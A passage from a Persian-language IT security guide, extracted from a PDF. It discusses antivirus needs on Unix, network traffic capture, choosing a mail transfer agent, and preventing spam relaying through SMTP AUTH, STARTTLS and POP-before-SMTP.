‫ﺳﻴﺴﺘﻤﻬﺎﻱ ‪ Unix‬ﻭ ‪ Linux‬ﻧﻴﺎﺯﻱ ﺑﻪ ﺍﺑﺰﺍﺭﻫﺎﻱ ﺿﺪﻭﻳﺮﻭﺱ ﻧﺪﺍﺭﻧﺪ‪ .‬ﺑﺮﺍﻱ ﺍﻳﻦ ﺑﺴﺘﺮﻫﺎ ﺗﻨﻬﺎ ‪ ۳‬ﻳﺎ ‪ ۴‬ﻭﻳﺮﻭﺱ ﮔـﺰﺍﺭﺵﺷـﺪﻩ ﻛـﻪ ﻗﺎﺑﻠﻴـﺖ‬
‫ﺍﻧﺘﺸﺎﺭ ﭼﻨﺪﺍﻧﻲ ﻧﻴﺰ ﻧﺪﺍﺭﻧﺪ‪ .‬ﺩﺭ ﺍﻳﻦ ﻣﺤﻴﻄﻬﺎ ﻳﻚ ﺑﺮﻧﺎﻣﺔ ﻧﻈﺎﺭﺕﻛﻨﻨﺪﺓ ﺻﺤﺖ )ﻣﺜﻞ ‪ (Tripwire‬ﺑﺪﻟﻴﻞ ﻧﻮﻉ ﻛﺎﺭﻱ ﻛﻪ ﺍﻧﺠﺎﻡ ﻣﻲﺩﻫﺪ‪ ،‬ﻛﺎﺭ ﻳﻚ‬
‫ﺿﺪﻭﻳﺮﻭﺱ ﺭﺍ ﻧﻴﺰ ﺑﻪ ﺍﻧﺠﺎﻡ ﻣﻲﺭﺳﺎﻧﺪ‪ .‬ﺍﻳﻦ ﺩﺭ ﺣﺎﻟﻲ ﺍﺳﺖ ﻛﻪ ﺳﻴﺴﺘﻤﻬﺎﻱ ﻗﺪﻳﻤﻲﺗﺮ ‪ Mac OS‬ﺑﺮﺍﻱ ﻣﻘﺎﺑﻠﻪ ﺑﺎ ‪Macro‬ﻫﺎﻱ ﺁﻟـﻮﺩﻩ ﺑـﻪ‬
‫ﻭﻳﺮﻭﺱ ﺩﺭ ﻣﺤﺼﻮﻻﺕ ‪ Microsoft Office‬ﺑﻪ ﺍﺑﺰﺍﺭﻫﺎﻱ ﺿﺪﻭﻳﺮﻭﺱ ﻧﻴﺎﺯ ﺩﺍﺭﻧﺪ‪.‬‬
‫ﺍﺯ ﻃﺮﻑ ﺩﻳﮕﺮ ﻳﻚ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ ﭘﺴﺘﻲ ‪ Unix‬ﻣﻲﺗﻮﺍﻧﺪ ﺑﻌﻨﻮﺍﻥ ﻳﻚ ﺩﺭﻭﺍﺯﺓ ﻭﺭﻭﺩﻱ ﺿﺪﻭﻳﺮﻭﺱ ﺑﺮﺍﻱ ﺣﻔﺎﻇﺖ ﺍﺯ ﺳﺮﻭﻳﺲﮔﻴﺮﻧﺪﻩﻫـﺎﻱ‬
‫ﭘﺴﺘﻲ ‪ Windows‬ﺑﻜﺎﺭ ﺭﻭﺩ‪ .‬ﺿﺪﻭﻳﺮﻭﺳﻬﺎﻱ ﺯﻳﺎﺩﻱ ﻣﻲﺗﻮﺍﻧﻨﺪ ﻭﻳﺮﻭﺳﻬﺎﻱ ‪ Windows‬ﺭﺍ ﺷﻨﺎﺳﺎﻳﻲ ﻛﻨﻨﺪ‪ ،‬ﻭ ﻣﻲﺗﻮﺍﻥ ﺗﻨﻬـﺎ ﺑـﻪ ﻫﻤـﻴﻦ‬
‫ﻣﻨﻈﻮﺭ ﺁﻧﻬﺎ ﺭﺍ ﺭﻭﻱ ﺩﺳﺘﮕﺎﻫﻬﺎﻱ ‪ Unix‬ﺑﻪ ﺍﺟﺮﺍ ﺩﺭﺁﻭﺭﺩ‪.‬‬

‫ﺍﺑﺰﺍﺭﻫﺎﻱ ﺛﺒﺖ ﻭ ﺿﺒﻂ ﺍﻃﻼﻋﺎﺕ ﺷﺒﻜﻪ‬


‫ﺍﻳﻦ ﺍﺑﺰﺍﺭﻫﺎ ﻫﻤﺔ ﺗﺮﺍﻓﻴﻜﻲ ﻛﻪ ﺍﺯ ﻳﻚ ﺷﺒﻜﻪ ﻣﻲﮔﺬﺭﺩ ﺭﺍ ﺿﺒﻂ ﻣﻲﻛﻨﻨﺪ ﺗﺎ ﺍﻣﻜﺎﻥ ﺍﻧﺠﺎﻡ ﺗﺠﺰﻳﻪ ﻭ ﺗﺤﻠﻴﻞ ﺁﻥ ﺩﺭ ﺁﻳﻨﺪﻩ ﻭﺟﻮﺩ ﺩﺍﺷـﺘﻪ ﺑﺎﺷـﺪ‪.‬‬
‫ﺑﺨﺶ ﭘﻨﺠﻢ‬

‫ﻻ ﺭﻭﻱ ﺭﺍﻳﺎﻧﻪﻫﺎﻳﻲ ﺑﺎ ﺩﻳﺴﻜﻬﺎﻱ ﺑﺰﺭﮒ ﺍﺟﺮﺍ ﻣﻲﺷﻮﻧﺪ‪ .‬ﺑﻌﻨﻮﺍﻥ ﻣﺜﺎﻝ ﻳﻚ ﺩﻳـﺴﻚ ﺳـﺨﺖ ‪ ۸۰‬ﮔﻴﮕﺎﺑـﺎﻳﺘﻲ ﻣـﻲﺗﻮﺍﻧـﺪ‬ ‫ﺍﻳﻦ ﺳﻴﺴﺘﻤﻬﺎ ﻣﻌﻤﻮ ﹰ‬
‫ﺗﺮﺍﻓﻴﻚ ﺣﺪﻭﺩ ﺩﻭ ﻫﻔﺘﺔ ﻳﻚ ﺷﺒﻜﺔ ﻣﻌﻤﻮﻟﻲ ‪ T1‬ﺭﺍ ﺩﺭ ﺧﻮﺩ ﺫﺧﻴﺮﻩ ﻧﻤﺎﻳﺪ ﺗﺎ ﺩﺭﺻﻮﺭﺕ ﻭﻗﻮﻉ ﻳﻚ ﻧﻔﻮﺫ ﻳﺎ ﺑـﺮﻭﺯ ﻫـﺮ ﺭﺧـﺪﺍﺩ ﺩﻳﮕـﺮ‪ ،‬ﺑﺘـﻮﺍﻥ‬
‫ﺗﺮﺍﻓﻴﻚ ﺿﺒﻂﺷﺪﻩ ﺭﺍ ﺗﺤﺖ ﺗﺠﺰﻳﻪ ﻭ ﺗﺤﻠﻴﻞ ﻗﺮﺍﺭ ﺩﺍﺩ‪.‬‬

‫ﺗﺄﻣﻴﻦ ﺍﻣﻨﻴﺖ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩﻫﺎﻱ ﭘﺴﺘﻲ‬


‫ﻻ ﻣﻬﻤﺘﺮﻳﻦ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩﻫﺎﻱ ﻫﺮ ﺳﺎﺯﻣﺎﻥ ﻫﺴﺘﻨﺪ‪ .‬ﺯﻣﺎﻧﻴﻜﻪ ﺍﻳﻦ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩﻫـﺎ ﺍﺯ ﻛـﺎﺭ ﻣـﻲﺍﻓﺘﻨـﺪ‪،‬‬ ‫ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩﻫﺎﻱ ﭘﺴﺘﻲ ﻣﻌﻤﻮ ﹰ‬
‫ﻳﻚ ﻣﺴﻴﺮ ﺍﺭﺗﺒﺎﻃﻲ ﻣﻬﻢ ﻣﻴﺎﻥ ﻣﺸﺘﺮﻳﺎﻥ‪ ،‬ﻓﺮﻭﺷﻨﺪﮔﺎﻥ‪ ،‬ﻭ ﻛﺎﺭﻣﻨﺪﺍﻥ ﺳﺎﺯﻣﺎﻥ ﺩﭼﺎﺭ ﺁﺳﻴﺐ ﻣﻲﺷﻮﺩ؛ ﻭ ﺯﻣﺎﻧﻴﻜـﻪ ﻣـﻮﺭﺩ ﺳـﻮﺀ ﺍﺳـﺘﻔﺎﺩﻩ ﻗـﺮﺍﺭ‬
‫ﻣﻲﮔﻴﺮﻧﺪ ﺍﻃﻼﻋﺎﺕ ﺧﺼﻮﺻﻲ ﻭ ﻣﺤﺮﻣﺎﻧﻪ ﺑﺴﺮﻋﺖ ﺍﻓﺸﺎ ﻣﻲﺷﻮﺩ‪ .‬ﺍﮔﺮﭼﻪ ﻣﻼﺣﻈﺎﺕ ﻛﻠﻲ ﺍﻣﻨﻴﺘﻲ ﺭﺍ ﺗﺎ ﺣﺪﻭﺩﻱ ﺑﺮﺍﻱ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩﻫـﺎﻱ‬
‫ﭘﺴﺘﻲ ﻧﻴﺰ ﻣﻲﺗﻮﺍﻥ ﺑﻜﺎﺭ ﺑﺮﺩ‪ ،‬ﺍﻣﺎ ﺑﺮﺧﻲ ﻣﻼﺣﻈﺎﺕ ﺧﺎﺹ ﻧﻴﺰ ﺑﺮﺍﻱ ﺍﻳﻦ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩﻫﺎ ﻭﺟﻮﺩ ﺩﺍﺭﺩ‪.‬‬

‫‪206 Intrusion Detection Systems‬‬


‫ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ‬ ‫‪٣٥٦‬‬

‫ﺍﻧﺘﺨﺎﺏ ﻳﻚ ﻋﺎﻣﻞ ﺍﻧﺘﻘﺎﻝ ﭘﺴﺘﻲ‬


‫ﻋﺎﻣﻞ ﺍﻧﺘﻘﺎﻝ ﭘﺴﺘﻲ )‪ ٢٠٧(MTA‬ﻧﺮﻡﺍﻓﺰﺍﺭﻱ ﺍﺳﺖ ﻛﻪ ﻣﺴﺌﻮﻟﻴﺖ ﺩﺭﻳﺎﻓﺖ ﻭ ﺗﺨﺼﻴﺺ ﭘﻴﺎﻣﻬﺎﻱ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺭﺍ ﺑﺮ ﻋﻬﺪﻩ ﺩﺍﺭﺩ‪ .‬ﺍﻳﻦ ﻧـﺮﻡﺍﻓـﺰﺍﺭ‬
‫ﺩﺭ ﻳﻚ ﻃﺮﻑ ﺑﺎ ﻋﺎﻣﻠﻬﺎﻱ ﻛﺎﺭﺑﺮﺍﻥ ﭘﺴﺘﻲ )ﻛﻪ ﺑﻪ ﻋﺎﻣﻞ ﺍﻧﺘﻘﺎﻝ ﭘﺴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺍﺗﺼﺎﻝ ﺩﺍﺭﺩ( ﻣﺘﺼﻞ ﺍﺳﺖ‪ ،‬ﻭ ﺩﺭ ﻃﺮﻑ ﺩﻳﮕﺮ ﺑـﺎ ﻋﻮﺍﻣـﻞ ﺣﻤـﻞ‬
‫ﭘﺴﺘﻲ )ﻛﻪ ﻋﻤﻠﻴﺎﺕ ﻧﻬﺎﻳﻲ ﺣﻤﻞ ﭘﻴﺎﻡ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺑﻪ ﻣﻘﺼﺪ ﺭﺍ ﺑﺮ ﻋﻬﺪﻩ ﺩﺍﺭﻧﺪ( ﺍﺭﺗﺒﺎﻁ ﺑﺮﻗﺮﺍﺭ ﻣﻲﻛﻨﺪ‪ .‬ﻧﺮﻡﺍﻓﺰﺍﺭ ‪ MTA‬ﺑﺎﻳﺪ ﺑﺪﺭﺳﺘﻲ ﭘﻴﻜﺮﺑﻨﺪﻱ ﺷﻮﺩ ﺗﺎ‬
‫ﺑﺘﻮﺍﻧﺪ ﭘﻴﺎﻣﻬﺎ ﺭﺍ ﺗﻨﻬﺎ ﺍﺯ ﻛﺎﺭﺑﺮﺍﻥ ﻭﺍﻗﻌﻲ ﻭ ﻧﻪ ﺩﻳﮕﺮﺍﻥ ﺑﭙﺬﻳﺮﺩ‪.‬‬
‫ﺑﺮﺍﻱ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩﻫﺎﻱ ﭘﺴﺘﻲ ﻣﺒﺘﻨﻲ ﺑﺮ ‪ ،Unix‬ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎﻱ ﭘﻴﺸﺮﻭﻱ ‪ MTA‬ﻋﺒﺎﺭﺗﻨﺪ ﺍﺯ ‪ ،qmail ،postfix ،sendmail‬ﻭ ‪،exim‬‬
‫ﻛﻪ ﻗﺪﻳﻤﻲﺗﺮﻳﻦ‪ ،‬ﺷﻨﺎﺧﺘﻪﺷﺪﻩﺗﺮﻳﻦ‪ ،‬ﻭ ﭘﺮﻛﺎﺭﺑﺮﺩﺗﺮﻳﻦ ﺁﻧﻬﺎ ‪ sendmail‬ﺍﺳﺖ؛ ﻭ ﺍﻟﺒﺘﻪ ﺑﺎﻳﺪ ﮔﻔﺖ ﻛﻪ ﺑﻴﺸﺘﺮﻳﻦ ﺭﺧﺪﺍﺩﻫﺎﻱ ﺛﺒﺖﺷﺪﺓ ﺍﻣﻨﻴﺘـﻲ‬
‫ﻧﻴﺰ ﻣﺮﺑﻮﻁ ﺑﻪ ﻫﻤﻴﻦ ﻧﺮﻡﺍﻓﺰﺍﺭ ﻣﻲﺷﻮﺩ‪ ،‬ﭼﺮﺍﻛﻪ ‪ sendmail‬ﺯﻣﺎﻧﻲ ﻃﺮﺍﺣﻲ ﺷﺪ ﻛﻪ ﺷﺒﻜﺔ ﺍﻳﻨﺘﺮﻧﺖ ﻫﻨﻮﺯ ﺑﺴﻴﺎﺭ ﺟﻮﺍﻥ ﺑـﻮﺩ ﻭ ﺩﺭ ﺁﻥ ﺯﻣـﺎﻥ‬
‫ﻛﺎﺭﺁﻳﻲ ﺍﻫﻤﻴﺖ ﺑﻴﺸﺘﺮﻱ ﺍﺯ ﺍﻣﻨﻴﺖ ﺩﺍﺷﺖ‪ .‬ﺍﻳﻦ ﺩﺭﺣﺎﻟﻲ ﺍﺳﺖ ﻛـﻪ ‪ ،qmail ،postfix‬ﻭ ‪ exim‬ﺍﺯ ﺍﺑﺘـﺪﺍ ﺑـﺎ ﻣـﺪ ﻧﻈـﺮ ﻗـﺮﺍﺭ ﺩﺍﺩﻥ ﺍﻣﻨﻴـﺖ‬
‫ﻃﺮﺍﺣﻲ ﺷﺪﻧﺪ‪ .‬ﺍﮔﺮ ﺑﺨﻮﺍﻫﻴﺪ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩﻫﺎﻱ ﭘﺴﺘﻲ ﺷﻤﺎ ﺍﻳﻤﻦ ﺑﺎﺷﻨﺪ‪ ،‬ﺑﻬﺘﺮ ﺍﺳﺖ ﻧﺮﻡﺍﻓـﺰﺍﺭﻱ ﻏﻴـﺮ ﺍﺯ ‪ sendmail‬ﺭﺍ ﺑﻌﻨـﻮﺍﻥ ‪MTA‬‬
‫ﺑﺮﮔﺰﻳﻨﻴﺪ‪ ،‬ﻭ ﺍﮔﺮ ﻣﺠﺒﻮﺭ ﺑﻪ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ‪ sendmail‬ﻫﺴﺘﻴﺪ‪ ،‬ﻣﺴﺘﻨﺪﺍﺕ ﺟﺎﻧﺒﻲ ﺁﻥ ﺑﻌﻼﻭﺓ ﻛﺘﺎﺏ ‪ Sendmail‬ﺍﻧﺘﺸﺎﺭﺍﺕ ﺍﻭﺭﻳﻠﻲ ﻭ ﺷـﺮﻛﺎ ﺭﺍ‬
‫ﺑﺪﻗﺖ ﻣﻄﺎﻟﻌﻪ ﻛﻨﻴﺪ ﻭ ﺑﻪ ﭘﻴﻜﺮﺑﻨﺪﻱ ﺻﺤﻴﺢ ﺁﻥ ﺗﻮﺟﻪ ﻭﻳﮋﻩ ﻧﻤﺎﻳﻴﺪ‪ .‬ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎﻱ ‪ postfix‬ﻭ ‪ exim‬ﻫﺮﺩﻭ ﻗﺎﺑﻠﻴﺖ ﺍﻳﻦ ﺭﺍ ﺩﺍﺭﻧﺪ ﻛﻪ ﺑـﺪﻭﻥ‬
‫ﺁﺛﺎﺭ ﺟﺎﻧﺒﻲ ﭼﻨﺪﺍﻥ ﺯﻳﺎﺩﻱ ﺟﺎﻳﮕﺰﻳﻦ ﺳﻴﺴﺘﻤﻬﺎﻱ ﺩﺭﺣﺎﻝ ﻛﺎﺭ ﻣﺒﺘﻨﻲ ﺑﺮ ‪ sendmail‬ﺷﻮﻧﺪ‪.‬‬
‫ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩﻫﺎﻱ ﭘﺴﺘﻲ ﻣﺒﺘﻨﻲ ﺑﺮ ‪ Windows‬ﻣﻲﺗﻮﺍﻧﻨﺪ ﺍﺯ ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎﻳﻲ ﻣﺜﻞ ‪ imail‬ﻳﺎ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ ‪Microsoft Exchange‬‬
‫ﺑﻌﻨﻮﺍﻥ ‪ MTA‬ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻨﺪ‪ .‬ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎﻱ ﺗﺤﺖ ‪ Windows‬ﺗﺎ ﺑﻪ ﺍﻣﺮﻭﺯ ﻧﺘﻮﺍﻧﺴﺘﻪﺍﻧﺪ ﺩﺭ ﭘﻴﺎﺩﻩﺳـﺎﺯﻱ ﺍﺳـﺘﺎﻧﺪﺍﺭﺩﻫﺎﻱ ﺍﻳﻨﺘﺮﻧﺘـﻲ ﭼﻨـﺪﺍﻥ‬
‫ﻣﻮﻓﻖ ﺑﺎﺷﻨﺪ ﻭ ﺍﻣﻨﻴﺖ ﺁﻧﻬﺎ ﻧﻴﺰ ﺗﺎ ﻛﻨﻮﻥ ﺩﺭ ﺳﻄﺢ ﻣﺘﻮﺳﻂ ﺑﻮﺩﻩ ﺍﺳﺖ‪.‬‬

‫ﻫﺮﺯﻧﺎﻣﻪ‬
‫ﻧﺎﻣﻪﻫﺎﻱ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﻧﺎﺧﻮﺍﺳﺘﺔ ﺗﺠﺎﺭﻱ )ﻛﻪ ﻋﻤﻮﻣﹰﺎ ﻫﺮﺯﻧﺎﻣﻪ ﺧﻮﺍﻧﺪﻩ ﻣﻲﺷﻮﻧﺪ( ﺑﻪ ﻳﻚ ﻣﺴﺌﻠﻪ ﺩﺭﺩﺳﺮﺳﺎﺯ ﻭ ﭘﺮﻫﺰﻳﻨﻪ ﺗﺒﺪﻳﻞ ﺷﺪﻩﺍﻧﺪ‪ .‬ﻫﻨﮕﺎﻡ ﺍﺭﺍﺋﻪ‬
‫ﺧﺪﻣﺎﺕ ﭘﺴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ‪ ،‬ﺑﺴﻴﺎﺭ ﺣﻴﺎﺗﻲ ﺍﺳﺖ ﻛﻪ ﺑﺘﻮﺍﻧﻴﺪ ﻣﻄﻤﺌﻦ ﺷﻮﻳﺪ ﻧﻪ ﺍﻓﺮﺍﺩ ﺧﺎﺭﺟﻲ ﻭ ﻧﻪ ﻛﺎﺭﺑﺮﺍﻥ ﻣﺠﺎﺯ ﺩﺍﺧﻠﻲ ﺑﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺳﻴﺴﺘﻢ‬
‫ﭘﺴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺷﻤﺎ ﻗﺎﺩﺭ ﺑﻪ ﺍﺭﺳﺎﻝ ﻫﺮﺯﻧﺎﻣﻪ ﻧﻴﺴﺘﻨﺪ‪.‬‬
‫ﺍﮔﺮ ﺍﺯ ﻳﻚ ﻧﺴﺨﺔ ﺑﻪﺭﻭﺯ ﻧﺮﻡﺍﻓﺰﺍﺭ ﻣﻮﺭﺩ ﺍﺳﺘﻔﺎﺩﻩ ﺑﻌﻨﻮﺍﻥ ‪ MTA‬ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﻛﻨﻴـﺪ‪ ،‬ﻛﻨﺘـﺮﻝ ﺩﺳﺘﺮﺳـﻲ ﺍﻓـﺮﺍﺩ ﺧـﺎﺭﺟﻲ ﺑـﻪ ﺧـﺪﻣﺎﺕ ﭘـﺴﺖ‬
‫ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﻧﺴﺒﺘﹰﺎ ﺁﺳﺎﻥ ﺧﻮﺍﻫﺪ ﺑﻮﺩ‪ .‬ﺩﺭﺣﺎﻝ ﺣﺎﺿﺮ ﺑﻴﺸﺘﺮ ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎﻱ ‪ MTA‬ﺑﺎ ﺗﻨﻈﻴﻤﺎﺕ ﺧﺎﺻﻲ ﺑﻪ ﻓﺮﻭﺵ ﻣﻲﺭﺳﻨﺪ ﺗﺎ ﭘﻴﺎﻣﻬـﺎ ﺭﺍ ﺗﻨﻬـﺎ‬
‫ﺩﺭﺻﻮﺭﺗﻲ ﻣﻨﺘﺸﺮ ﻛﻨﻨﺪ ﻛﻪ ﮔﻴﺮﻧﺪﺓ ﺁﻧﻬﺎ ﻳﻚ ﻣﺎﺷﻴﻦ ﺩﺍﺧﻠﻲ ﺑﺎﺷﺪ ﻭ ﻳﺎ ﺍﺯ ﻳﻚ ﺭﺍﻳﺎﻧﺔ ﻗﺎﺑﻞ ﺍﻋﺘﻤﺎﺩ ﻓﺮﺳﺘﺎﺩﻩ ﺷـﺪﻩ ﺑﺎﺷـﻨﺪ‪ .‬ﻣﻨﻈـﻮﺭ ﺍﺯ "ﺭﺍﻳﺎﻧـﺔ‬
‫ﻗﺎﺑﻞ ﺍﻋﺘﻤﺎﺩ" ﺩﺳﺘﮕﺎﻫﻲ ﺍﺳﺖ ﻛﻪ ﺩﺍﺭﺍﻱ ﻳﻚ ﺁﺩﺭﺱ ‪ IP‬ﺧﺎﺹ ﻣﻲﺑﺎﺷﺪ )ﺍﻟﺒﺘﻪ ﺍﻳﻦ ﻧﺸﺎﻥ ﺗﻨﻬﺎ ﺩﺭﺣﺎﻟﺘﻲ ﻣﻌﺘﺒﺮ ﺍﺳﺖ ﻛﻪ ﺩﺳـﺘﮕﺎﻩ ﻣـﺬﻛﻮﺭ ﺩﺍﺧـﻞ ﻳـﻚ‬
‫ﻣﺤﻴﻂ ﺣﻔﺎﻇﺖﺷﺪﻩ ﺑﻮﺳﻴﻠﺔ ﻳﻚ "ﺩﻳﻮﺍﺭﺓ ﺁﺗﺶ" ﻗﺮﺍﺭ ﺩﺍﺷﺘﻪ ﺑﺎﺷﺪ ﻭ ﺩﺭ ﺁﻥ ﻣﺤﻴﻂ ﺍﺯ ﮔﻤﺮﺍﻩﺳﺎﺯﻱ ‪ IP‬ﻧﻴﺰ ﺟﻠﻮﮔﻴﺮﻱ ﺷﻮﺩ(‪ ،‬ﻭ ﻳﺎ ﺩﺳـﺘﮕﺎﻫﻲ ﻛـﻪ ﻣـﻲﺗﻮﺍﻧـﺪ ﺑـﺎ‬
‫ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺭﻣﺰﻧﮕﺎﺭﻱ‪ ،‬ﺧﻮﺩ ﺭﺍ ﺑﺮﺍﻱ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩ‪ ،‬ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ ﻛﻨﺪ‪.‬‬
‫ﻻ ﺑﺮﺍﻱ ﺳﺮﻭﻳﺲﮔﻴﺮﻧﺪﻩﻫﺎﻱ ﭘﺴﺘﻲ ﻛﻪ ﺭﻭﻱ ﺭﺍﻳﺎﻧﻪﻫﺎﻱ ﻛﻴﻔـﻲ ﻭ ﺳـﺎﻳﺮ ﺩﺳـﺘﮕﺎﻫﻬﺎﻳﻲ ﻛـﻪ‬ ‫ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ ﺑﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺭﻣﺰﻧﮕﺎﺭﻱ ﻣﻌﻤﻮ ﹰ‬
‫ﺁﺩﺭﺳﻬﺎﻱ ‪ IP‬ﺧﻮﺩ ﺭﺍ ﺑـﺼﻮﺭﺕ ﭘﻮﻳـﺎ ﺩﺭﻳﺎﻓـﺖ ﻣـﻲﻛﻨﻨـﺪ ﻛـﺎﺭﺑﺮﺩ ﺩﺍﺭﺩ‪ .‬ﻳـﻚ ﺭﻭﺵ ﭘﺮﻛـﺎﺭﺑﺮﺩ ﺑـﺮﺍﻱ ﺍﻳـﻦ ﻣﻨﻈـﻮﺭ ﺍﺳـﺘﻔﺎﺩﻩ ﺍﺯ ﭘﺮﻭﺗﻜـﻞ‬
‫‪ SMTP AUTH‬ﺍﺳﺖ‪ ،‬ﻛﻪ ﺩﺭ ﻭﺍﻗﻊ ﺗﻜﺎﻣﻞﻳﺎﻓﺘﺔ ﭘﺮﻭﺗﻜﻞ ‪ SMTP‬ﻣﻲﺑﺎﺷﺪ ﻭ ﺑﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﻣﻜﺎﻧﻴﺰﻣﻬﺎﻱ "ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ ﺳﺎﺩﻩ" ﻭ "ﻻﻳﺔ‬
‫ﺍﻣﻨﻴﺖ" ﻛﻪ ﺩﺭ ‪ RFC‬ﺷﻤﺎﺭﺓ ‪ ۲۲۲۲‬ﺷﺮﺡ ﺩﺍﺩﻩ ﺷﺪﻩ‪ ،‬ﺍﻣﻜـﺎﻥ ﺗـﺼﺪﻳﻖ ﻫﻮﻳـﺖ ﺭﺍ ﺑﻮﺟـﻮﺩ ﻣـﻲﺁﻭﺭﺩ‪ .‬ﺭﺍﻫﻜـﺎﺭ ﺩﻳﮕـﺮ ﺁﻥ ﺍﺳـﺖ ﻛـﻪ ﺑـﺮﺍﻱ‬
‫‪٢٠٨‬‬
‫ﺳﺮﻭﻳﺲ‪۶‬ﮔﻴﺮﻧﺪﻩﻫﺎ ﮔﻮﺍﻫﻴﻨﺎﻣﺔ ‪ TLS‬ﺻﺎﺩﺭ ﺷﻮﺩ ﻭ ﺑﺮﺍﻱ ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ ﺁﻧﻬﺎ ﻧﻴﺰ ﭘﺮﻭﺗﻜﻞ ‪ STARTTLS‬ﺑﻜﺎﺭ ﺭﻭﺩ‪.‬‬

‫‪207 Mail Transfer Agent‬‬


‫‪ ۲۰۸‬ﺭﻭﺵ ﻣﻌﻤﻮﻟﺘﺮ ﻛﻪ ﺍﻟﺒﺘﻪ ﺍﻳﻤﻨﻲ ﻛﻤﺘﺮﻱ ﺩﺍﺭﺩ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺭﻭﺵ ‪ POP-before-SMTP‬ﺍﺳﺖ‪ .‬ﺩﺭ ﺍﻳﻦ ﺭﻭﺵ ﺍﺑﺘﺪﺍ ﺳﺮﻭﻳﺲﮔﻴﺮﻧﺪﻩﻫﺎ ﺑﺎﻳﺪ ﭘﺴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺧـﻮﺩ ﺭﺍ ﺍﺯ‬
‫ﻃﺮﻳﻖ ‪ POP‬ﻛﻪ ﺁﺩﺭﺳﻬﺎﻱ ‪ IP‬ﺁﻧﻬﺎ ﺭﺍ ﺛﺒﺖ ﻣﻲﻛﻨﺪ ﻛﻨﺘﺮﻝ ﻧﻤﺎﻳﻨﺪ‪ .‬ﺳﭙﺲ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ ‪ SMTP‬ﺑﺮﺍﻱ ﻳﻚ ﺑﺎﺯﺓ ﻛﻮﺗﺎﻩ ﺯﻣﺎﻧﻲ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺁﺩﺭﺳﻬﺎﻱ ‪ IP‬ﺛﺒـﺖﺷـﺪﻩ ﺭﺍ‬
‫ﻣﺠﺎﺯ ﻣﻲﺩﺍﻧﺪ‪ .‬ﻫﺮﭼﻨﺪ ﺍﻳﻦ ﺭﻭﺵ ﻣﻲﺗﻮﺍﻧﺪ ﺑﺎﻋﺚ ﺭﺿﺎﻳﺘﻤﻨﺪﻱ ﺷﻮﺩ‪ ،‬ﺍﻣﺎ ﺍﻣﻨﻴﺖ ﻛﻤﺘﺮﻱ ﺩﺍﺭﺩ‪ ،‬ﻣﮕﺮ ﺍﻳﻨﻜﻪ ﺍﺗﺼﺎﻻﺕ ‪ POP‬ﻫﻢ ﺭﻣﺰﮔﺬﺍﺭﻱ ﺷﻮﻧﺪ‪.‬‬
‫‪٣٥٧‬‬ ‫ﺑﺨﺶ ﭘﻨﺠﻢ‪ :‬ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺭﺍﻫﺒﺮﺍﻥ ﻓﻨﻲ‬

‫ﻛﺴﺎﻧﻲ ﻛﻪ ﺩﺭﻭﻥ ﺷﺒﻜﺔ ﺷﻤﺎ ﻗﺮﺍﺭ ﺩﺍﺭﻧﺪ ﻭ ﻫﺮﺯﻧﺎﻣﻪ ﻣﻲﻓﺮﺳﺘﻨﺪ ﻣﻲﺗﻮﺍﻧﻨﺪ ﭘﻬﻨﺎﻱ ﺑﺎﻧﺪ ﺷﺒﻜﺔ ﺳﺎﺯﻣﺎﻥ ﺭﺍ ﺍﺷﻐﺎﻝ ﻛﻨﻨﺪ ﻭ ﺑﺴﺮﻋﺖ ﺍﻋﺘﺒﺎﺭ ﺷـﻤﺎ‬
